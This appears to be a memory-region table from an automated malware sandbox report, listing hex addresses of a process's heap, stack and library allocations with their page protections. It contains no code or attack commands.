7FFE7E0C5000
|
trusted library allocation
|
page read and write
|
||
1B470C92000
|
heap
|
page read and write
|
||
7260000
|
heap
|
page execute and read and write
|
||
3185000
|
heap
|
page read and write
|
||
1DEA23B0000
|
heap
|
page read and write
|
||
855B000
|
trusted library allocation
|
page read and write
|
||
1B470CA9000
|
heap
|
page read and write
|
||
1DEA205C000
|
heap
|
page read and write
|
||
1B46EF40000
|
heap
|
page read and write
|
||
1B470B21000
|
heap
|
page read and write
|
||
1B46ED79000
|
heap
|
page read and write
|
||
311D000
|
trusted library allocation
|
page execute and read and write
|
||
1DE89B78000
|
trusted library allocation
|
page read and write
|
||
1B470B6F000
|
heap
|
page read and write
|
||
1B470C53000
|
heap
|
page read and write
|
||
3560000
|
heap
|
page read and write
|
||
1B470CA9000
|
heap
|
page read and write
|
||
1B470D21000
|
heap
|
page read and write
|
||
1B46ED99000
|
heap
|
page read and write
|
||
1B46EBD0000
|
heap
|
page read and write
|
||
7670000
|
heap
|
page read and write
|
||
1B46EEA0000
|
remote allocation
|
page read and write
|
||
1B470CF9000
|
heap
|
page read and write
|
||
1B831FF000
|
stack
|
page read and write
|
||
1B470CA5000
|
heap
|
page read and write
|
||
1B470C80000
|
heap
|
page read and write
|
||
1DE87F10000
|
heap
|
page read and write
|
||
1DE89945000
|
heap
|
page read and write
|
||
7FFE7DFC6000
|
trusted library allocation
|
page execute and read and write
|
||
1DE99971000
|
trusted library allocation
|
page read and write
|
||
79F0000
|
trusted library allocation
|
page read and write
|
||
1B470B28000
|
heap
|
page read and write
|
||
1B470CE3000
|
heap
|
page read and write
|
||
4D5E000
|
stack
|
page read and write
|
||
1B46EDE9000
|
heap
|
page read and write
|
||
1B46EE1F000
|
heap
|
page read and write
|
||
1DE99960000
|
trusted library allocation
|
page read and write
|
||
1B470B23000
|
heap
|
page read and write
|
||
4134CFF000
|
unkown
|
page read and write
|
||
1B470B27000
|
heap
|
page read and write
|
||
1B470C72000
|
heap
|
page read and write
|
||
1B470B23000
|
heap
|
page read and write
|
||
85ED000
|
heap
|
page read and write
|
||
1B470B26000
|
heap
|
page read and write
|
||
7258000
|
trusted library allocation
|
page read and write
|
||
1B46EF48000
|
heap
|
page read and write
|
||
75DE000
|
stack
|
page read and write
|
||
4134C7B000
|
stack
|
page read and write
|
||
1DE899D5000
|
trusted library allocation
|
page read and write
|
||
1DE99951000
|
trusted library allocation
|
page read and write
|
||
7FFE7E0F0000
|
trusted library allocation
|
page read and write
|
||
7250000
|
trusted library allocation
|
page read and write
|
||
1B470C38000
|
heap
|
page read and write
|
||
1B470CA5000
|
heap
|
page read and write
|
||
1B470CA5000
|
heap
|
page read and write
|
||
7DF4E7210000
|
trusted library allocation
|
page execute and read and write
|
||
1B46EE62000
|
heap
|
page read and write
|
||
85BB000
|
heap
|
page read and write
|
||
9270A88000
|
stack
|
page read and write
|
||
1DEA1F03000
|
heap
|
page read and write
|
||
926FD38000
|
stack
|
page read and write
|
||
3550000
|
trusted library allocation
|
page read and write
|
||
1B470CD1000
|
heap
|
page read and write
|
||
1B470B4A000
|
heap
|
page read and write
|
||
326C000
|
stack
|
page read and write
|
||
7FFE7E0D0000
|
trusted library allocation
|
page execute and read and write
|
||
926FDBC000
|
stack
|
page read and write
|
||
8430000
|
trusted library allocation
|
page read and write
|
||
8530000
|
trusted library allocation
|
page read and write
|
||
1DE8AD57000
|
trusted library allocation
|
page read and write
|
||
1B470CA9000
|
heap
|
page read and write
|
||
1B470C72000
|
heap
|
page read and write
|
||
926F9FC000
|
stack
|
page read and write
|
||
79D0000
|
trusted library allocation
|
page read and write
|
||
1DE8A4E1000
|
trusted library allocation
|
page read and write
|
||
1B470CBF000
|
heap
|
page read and write
|
||
1B470B6F000
|
heap
|
page read and write
|
||
1B470CA9000
|
heap
|
page read and write
|
||
1DE87D50000
|
heap
|
page read and write
|
||
1DE89810000
|
trusted library allocation
|
page read and write
|
||
8570000
|
heap
|
page read and write
|
||
1B470C72000
|
heap
|
page read and write
|
||
7FFE7E170000
|
trusted library allocation
|
page read and write
|
||
1B470C72000
|
heap
|
page read and write
|
||
1B470C80000
|
heap
|
page read and write
|
||
9270C0B000
|
stack
|
page read and write
|
||
8B30000
|
trusted library allocation
|
page execute and read and write
|
||
3110000
|
trusted library allocation
|
page read and write
|
||
4DD2000
|
trusted library allocation
|
page read and write
|
||
1B470B24000
|
heap
|
page read and write
|
||
1B470C46000
|
heap
|
page read and write
|
||
926F5F3000
|
stack
|
page read and write
|
||
BC8000
|
stack
|
page read and write
|
||
926F97E000
|
stack
|
page read and write
|
||
1B832FE000
|
stack
|
page read and write
|
||
1B470C21000
|
heap
|
page read and write
|
||
8AE0000
|
direct allocation
|
page read and write
|
||
1B46EE01000
|
heap
|
page read and write
|
||
1DE87EF0000
|
trusted library allocation
|
page read and write
|
||
4C4E000
|
stack
|
page read and write
|
||
5D71000
|
trusted library allocation
|
page read and write
|
||
7FFE7E1D0000
|
trusted library allocation
|
page read and write
|
||
1DEA2168000
|
heap
|
page read and write
|
||
926FAFE000
|
stack
|
page read and write
|
||
926FCB6000
|
stack
|
page read and write
|
||
1B46EF48000
|
heap
|
page read and write
|
||
1DE8B2AE000
|
trusted library allocation
|
page read and write
|
||
8580000
|
heap
|
page read and write
|
||
1DE8B218000
|
trusted library allocation
|
page read and write
|
||
1A59FF40000
|
heap
|
page read and write
|
||
1B470CA5000
|
heap
|
page read and write
|
||
1B470C57000
|
heap
|
page read and write
|
||
3300000
|
heap
|
page read and write
|
||
1DEA1957000
|
heap
|
page read and write
|
||
1B470C78000
|
heap
|
page read and write
|
||
1B470C78000
|
heap
|
page read and write
|
||
1B46EDFF000
|
heap
|
page read and write
|
||
926FB7E000
|
stack
|
page read and write
|
||
8805000
|
trusted library allocation
|
page read and write
|
||
1DEA20CB000
|
heap
|
page read and write
|
||
1DEA20D3000
|
heap
|
page read and write
|
||
84AE000
|
stack
|
page read and write
|
||
3140000
|
trusted library allocation
|
page read and write
|
||
3142000
|
trusted library allocation
|
page read and write
|
||
1B470C80000
|
heap
|
page read and write
|
||
1B470C3B000
|
heap
|
page read and write
|
||
1B470B37000
|
heap
|
page read and write
|
||
7960000
|
trusted library allocation
|
page read and write
|
||
7FFE7DEE2000
|
trusted library allocation
|
page read and write
|
||
84EE000
|
stack
|
page read and write
|
||
1B46EF48000
|
heap
|
page read and write
|
||
1DE89FA7000
|
trusted library allocation
|
page read and write
|
||
1DEA2142000
|
heap
|
page read and write
|
||
1B46ECB0000
|
heap
|
page read and write
|
||
1B470B53000
|
heap
|
page read and write
|
||
1B470CA5000
|
heap
|
page read and write
|
||
1B46EF48000
|
heap
|
page read and write
|
||
926FE3E000
|
stack
|
page read and write
|
||
1B470B28000
|
heap
|
page read and write
|
||
1B470D45000
|
heap
|
page read and write
|
||
1DEA2164000
|
heap
|
page read and write
|
||
3188000
|
heap
|
page read and write
|
||
1DE8B7E7000
|
trusted library allocation
|
page read and write
|
||
1B470B20000
|
heap
|
page read and write
|
||
926FBF8000
|
stack
|
page read and write
|
||
1DE89DD8000
|
trusted library allocation
|
page read and write
|
||
1B470DF4000
|
heap
|
page read and write
|
||
1B46EE01000
|
heap
|
page read and write
|
||
5D99000
|
trusted library allocation
|
page read and write
|
||
7A9C000
|
stack
|
page read and write
|
||
1B470C49000
|
heap
|
page read and write
|
||
1DE89DCD000
|
trusted library allocation
|
page read and write
|
||
32F4000
|
heap
|
page read and write
|
||
1B470C57000
|
heap
|
page read and write
|
||
7FFE7E270000
|
trusted library allocation
|
page read and write
|
||
1DEA2151000
|
heap
|
page read and write
|
||
1DEA215B000
|
heap
|
page read and write
|
||
320F000
|
stack
|
page read and write
|
||
7FFE7E000000
|
trusted library allocation
|
page execute and read and write
|
||
1B46ED9F000
|
heap
|
page read and write
|
||
1B470CE6000
|
heap
|
page read and write
|
||
1B470B4A000
|
heap
|
page read and write
|
||
1B46ED70000
|
heap
|
page read and write
|
||
8A00000
|
trusted library allocation
|
page read and write
|
||
4D71000
|
trusted library allocation
|
page read and write
|
||
1B470C46000
|
heap
|
page read and write
|
||
1DE87F76000
|
heap
|
page read and write
|
||
3356000
|
heap
|
page read and write
|
||
1B470B28000
|
heap
|
page read and write
|
||
32AE000
|
stack
|
page read and write
|
||
7FFE7E1C0000
|
trusted library allocation
|
page read and write
|
||
3129000
|
trusted library allocation
|
page read and write
|
||
3363000
|
heap
|
page read and write
|
||
1B470C38000
|
heap
|
page read and write
|
||
8790000
|
trusted library allocation
|
page read and write
|
||
30F0000
|
trusted library section
|
page read and write
|
||
926FC3F000
|
stack
|
page read and write
|
||
1DE87F00000
|
heap
|
page execute and read and write
|
||
1B470D70000
|
heap
|
page read and write
|
||
7F310000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE7E120000
|
trusted library allocation
|
page read and write
|
||
7FFE7DFA0000
|
trusted library allocation
|
page execute and read and write
|
||
4CD0000
|
heap
|
page read and write
|
||
7FFE7E210000
|
trusted library allocation
|
page read and write
|
||
7680000
|
heap
|
page read and write
|
||
89F0000
|
trusted library allocation
|
page execute and read and write
|
||
926FFBE000
|
stack
|
page read and write
|
||
7A30000
|
trusted library allocation
|
page read and write
|
||
7850000
|
heap
|
page execute and read and write
|
||
73B0000
|
heap
|
page read and write
|
||
1B46EDDC000
|
heap
|
page read and write
|
||
1B470B21000
|
heap
|
page read and write
|
||
1B470CD5000
|
heap
|
page read and write
|
||
789E000
|
stack
|
page read and write
|
||
1B46ED9A000
|
heap
|
page read and write
|
||
1B470C72000
|
heap
|
page read and write
|
||
1B82AFE000
|
stack
|
page read and write
|
||
1DE8B6E2000
|
trusted library allocation
|
page read and write
|
||
1B46EDA0000
|
heap
|
page read and write
|
||
1DE898D0000
|
heap
|
page read and write
|
||
1B470C53000
|
heap
|
page read and write
|
||
9FEB000
|
direct allocation
|
page execute and read and write
|
||
7FFE7DEED000
|
trusted library allocation
|
page execute and read and write
|
||
8586000
|
heap
|
page read and write
|
||
1B470B53000
|
heap
|
page read and write
|
||
1B470CD6000
|
heap
|
page read and write
|
||
1B46EE53000
|
heap
|
page read and write
|
||
1B46EE0E000
|
heap
|
page read and write
|
||
1B46EDA0000
|
heap
|
page read and write
|
||
1DE89920000
|
heap
|
page execute and read and write
|
||
E40000
|
heap
|
page read and write
|
||
1DE8B705000
|
trusted library allocation
|
page read and write
|
||
1B46EDAF000
|
heap
|
page read and write
|
||
1B470C78000
|
heap
|
page read and write
|
||
7FFE7DEF0000
|
trusted library allocation
|
page read and write
|
||
1DEA2154000
|
heap
|
page read and write
|
||
8588000
|
heap
|
page read and write
|
||
1B470B53000
|
heap
|
page read and write
|
||
7FFE7E1A0000
|
trusted library allocation
|
page read and write
|
||
1B470C57000
|
heap
|
page read and write
|
||
1B470C57000
|
heap
|
page read and write
|
||
8540000
|
trusted library allocation
|
page read and write
|
||
1B470DF6000
|
heap
|
page read and write
|
||
79E0000
|
trusted library allocation
|
page read and write
|
||
7FFE7DEE0000
|
trusted library allocation
|
page read and write
|
||
1DE8B6D1000
|
trusted library allocation
|
page read and write
|
||
7FFE7E100000
|
trusted library allocation
|
page read and write
|
||
1B46EF45000
|
heap
|
page read and write
|
||
1B470CEE000
|
heap
|
page read and write
|
||
3334000
|
heap
|
page read and write
|
||
1DE89DE5000
|
trusted library allocation
|
page read and write
|
||
1B470B2B000
|
heap
|
page read and write
|
||
7970000
|
trusted library allocation
|
page execute and read and write
|
||
1DE87F5C000
|
heap
|
page read and write
|
||
8550000
|
trusted library allocation
|
page read and write
|
||
3218000
|
trusted library allocation
|
page read and write
|
||
1DE87FA3000
|
heap
|
page read and write
|
||
1B470C48000
|
heap
|
page read and write
|
||
1DE89940000
|
heap
|
page read and write
|
||
1B470C51000
|
heap
|
page read and write
|
||
1B470C95000
|
heap
|
page read and write
|
||
1B46EDBC000
|
heap
|
page read and write
|
||
894C000
|
stack
|
page read and write
|
||
32B0000
|
trusted library allocation
|
page execute and read and write
|
||
1DEA1E47000
|
heap
|
page execute and read and write
|
||
1DE87F55000
|
heap
|
page read and write
|
||
7FFE7E1E0000
|
trusted library allocation
|
page read and write
|
||
79C0000
|
trusted library allocation
|
page read and write
|
||
1B470B53000
|
heap
|
page read and write
|
||
1B470CC2000
|
heap
|
page read and write
|
||
7FFE7DEFB000
|
trusted library allocation
|
page read and write
|
||
1B46EEA0000
|
remote allocation
|
page read and write
|
||
1DE881B0000
|
trusted library allocation
|
page read and write
|
||
1B470B2E000
|
heap
|
page read and write
|
||
795D000
|
stack
|
page read and write
|
||
4CC0000
|
heap
|
page execute and read and write
|
||
1B470C40000
|
heap
|
page read and write
|
||
8520000
|
trusted library allocation
|
page read and write
|
||
1DE8B6E4000
|
trusted library allocation
|
page read and write
|
||
1B470C95000
|
heap
|
page read and write
|
||
1DE87FEB000
|
heap
|
page read and write
|
||
1B470B2F000
|
heap
|
page read and write
|
||
1B470C57000
|
heap
|
page read and write
|
||
1DEA1E6E000
|
heap
|
page read and write
|
||
3160000
|
trusted library allocation
|
page read and write
|
||
1A59FF45000
|
heap
|
page read and write
|
||
85BF000
|
heap
|
page read and write
|
||
73CB000
|
heap
|
page read and write
|
||
1B470CA5000
|
heap
|
page read and write
|
||
7FFE7DEE3000
|
trusted library allocation
|
page execute and read and write
|
||
3336000
|
heap
|
page read and write
|
||
1B46EDC9000
|
heap
|
page read and write
|
||
926F87E000
|
stack
|
page read and write
|
||
926FA7E000
|
stack
|
page read and write
|
||
1B46EE62000
|
heap
|
page read and write
|
||
5338000
|
trusted library allocation
|
page read and write
|
||
1B470C80000
|
heap
|
page read and write
|
||
1B46EE60000
|
heap
|
page read and write
|
||
1DEA1F70000
|
heap
|
page read and write
|
||
1DEA20C6000
|
heap
|
page read and write
|
||
1B82FFB000
|
stack
|
page read and write
|
||
1B470C20000
|
heap
|
page read and write
|
||
1B470CA5000
|
heap
|
page read and write
|
||
1B46EED0000
|
heap
|
page read and write
|
||
30C0000
|
heap
|
page read and write
|
||
1DE8B300000
|
trusted library allocation
|
page read and write
|
||
7FFE7E0A0000
|
trusted library allocation
|
page execute and read and write
|
||
1B470CC7000
|
heap
|
page read and write
|
||
B8C000
|
stack
|
page read and write
|
||
1B470B27000
|
heap
|
page read and write
|
||
1B470D9E000
|
heap
|
page read and write
|
||
7FFE7E130000
|
trusted library allocation
|
page read and write
|
||
890C000
|
stack
|
page read and write
|
||
1DEA1F2F000
|
heap
|
page read and write
|
||
84F0000
|
trusted library allocation
|
page execute and read and write
|
||
1B470B53000
|
heap
|
page read and write
|
||
7990000
|
trusted library allocation
|
page read and write
|
||
1B470D9F000
|
heap
|
page read and write
|
||
1B470CF9000
|
heap
|
page read and write
|
||
1DEA212E000
|
heap
|
page read and write
|
||
1B46EE10000
|
heap
|
page read and write
|
||
1B470CD7000
|
heap
|
page read and write
|
||
1B46EE53000
|
heap
|
page read and write
|
||
76B3000
|
heap
|
page read and write
|
||
1B470C95000
|
heap
|
page read and write
|
||
7A40000
|
trusted library allocation
|
page execute and read and write
|
||
4C0F000
|
stack
|
page read and write
|
||
1B470C95000
|
heap
|
page read and write
|
||
7FFE7E240000
|
trusted library allocation
|
page read and write
|
||
1B470CC4000
|
heap
|
page read and write
|
||
79B0000
|
trusted library allocation
|
page read and write
|
||
1B46EDFF000
|
heap
|
page read and write
|
||
4BCE000
|
stack
|
page read and write
|
||
4D68000
|
heap
|
page read and write
|
||
76CA000
|
heap
|
page read and write
|
||
1B470C57000
|
heap
|
page read and write
|
||
1B46EE27000
|
heap
|
page read and write
|
||
3113000
|
trusted library allocation
|
page execute and read and write
|
||
1DE8A4CD000
|
trusted library allocation
|
page read and write
|
||
1B470CA9000
|
heap
|
page read and write
|
||
1B470C51000
|
heap
|
page read and write
|
||
4134D7F000
|
stack
|
page read and write
|
||
30E0000
|
trusted library section
|
page read and write
|
||
7FFE7E190000
|
trusted library allocation
|
page read and write
|
||
1DE87FDE000
|
heap
|
page read and write
|
||
761F000
|
stack
|
page read and write
|
||
1B470CD0000
|
heap
|
page read and write
|
||
1B470C72000
|
heap
|
page read and write
|
||
78DE000
|
stack
|
page read and write
|
||
1B470C95000
|
heap
|
page read and write
|
||
1B470CA9000
|
heap
|
page read and write
|
||
7A50000
|
trusted library allocation
|
page read and write
|
||
1B470D70000
|
heap
|
page read and write
|
||
1A59FC50000
|
heap
|
page read and write
|
||
4C8E000
|
stack
|
page read and write
|
||
1A59FC66000
|
heap
|
page read and write
|
||
1DE8A2C9000
|
trusted library allocation
|
page read and write
|
||
926F8FE000
|
stack
|
page read and write
|
||
3145000
|
trusted library allocation
|
page execute and read and write
|
||
7265000
|
heap
|
page execute and read and write
|
||
1DEA1EA6000
|
heap
|
page read and write
|
||
1DE881C0000
|
heap
|
page read and write
|
||
1DE8A4F7000
|
trusted library allocation
|
page read and write
|
||
1DE87ED0000
|
trusted library allocation
|
page read and write
|
||
1B46EE32000
|
heap
|
page read and write
|
||
1DEA2050000
|
heap
|
page read and write
|
||
1B82DFF000
|
stack
|
page read and write
|
||
1B470C57000
|
heap
|
page read and write
|
||
1B470B2F000
|
heap
|
page read and write
|
||
9270A0F000
|
stack
|
page read and write
|
||
1DE87E50000
|
heap
|
page read and write
|
||
7FFE7DEE4000
|
trusted library allocation
|
page read and write
|
||
1DEA1E40000
|
heap
|
page execute and read and write
|
||
1B470C53000
|
heap
|
page read and write
|
||
1B470C72000
|
heap
|
page read and write
|
||
1DE87F1D000
|
heap
|
page read and write
|
||
1B46EE62000
|
heap
|
page read and write
|
||
1B46ECD0000
|
heap
|
page read and write
|
||
1B470CB2000
|
heap
|
page read and write
|
||
7FFE7E0C7000
|
trusted library allocation
|
page read and write
|
||
85B3000
|
heap
|
page read and write
|
||
1DE99C47000
|
trusted library allocation
|
page read and write
|
||
31CE000
|
stack
|
page read and write
|
||
8500000
|
heap
|
page read and write
|
||
1A59FE40000
|
heap
|
page read and write
|
||
1B46EEA0000
|
remote allocation
|
page read and write
|
||
1A59FC59000
|
heap
|
page read and write
|
||
1B470CA5000
|
heap
|
page read and write
|
||
1B470C93000
|
heap
|
page read and write
|
||
7FFE7E160000
|
trusted library allocation
|
page read and write
|
||
1DE8B6F0000
|
trusted library allocation
|
page read and write
|
||
7FFE7DF96000
|
trusted library allocation
|
page read and write
|
||
5DD6000
|
trusted library allocation
|
page read and write
|
||
7A20000
|
trusted library allocation
|
page read and write
|
||
1DE87E90000
|
heap
|
page read and write
|
||
1B470C78000
|
heap
|
page read and write
|
||
8770000
|
trusted library allocation
|
page read and write
|
||
1B470DF0000
|
heap
|
page read and write
|
||
1B470CD0000
|
heap
|
page read and write
|
||
1B470CA9000
|
heap
|
page read and write
|
||
1B470CA9000
|
heap
|
page read and write
|
||
F60000
|
heap
|
page read and write
|
||
1B470C3E000
|
heap
|
page read and write
|
||
1B470B53000
|
heap
|
page read and write
|
||
1B470B53000
|
heap
|
page read and write
|
||
79A0000
|
trusted library allocation
|
page read and write
|
||
1B470CF0000
|
heap
|
page read and write
|
||
1B470CD3000
|
heap
|
page read and write
|
||
1B470CB9000
|
heap
|
page read and write
|
||
1DE8B246000
|
trusted library allocation
|
page read and write
|
||
1B470CB2000
|
heap
|
page read and write
|
||
1B46EE0A000
|
heap
|
page read and write
|
There are 525 hidden memdumps, click here to show them.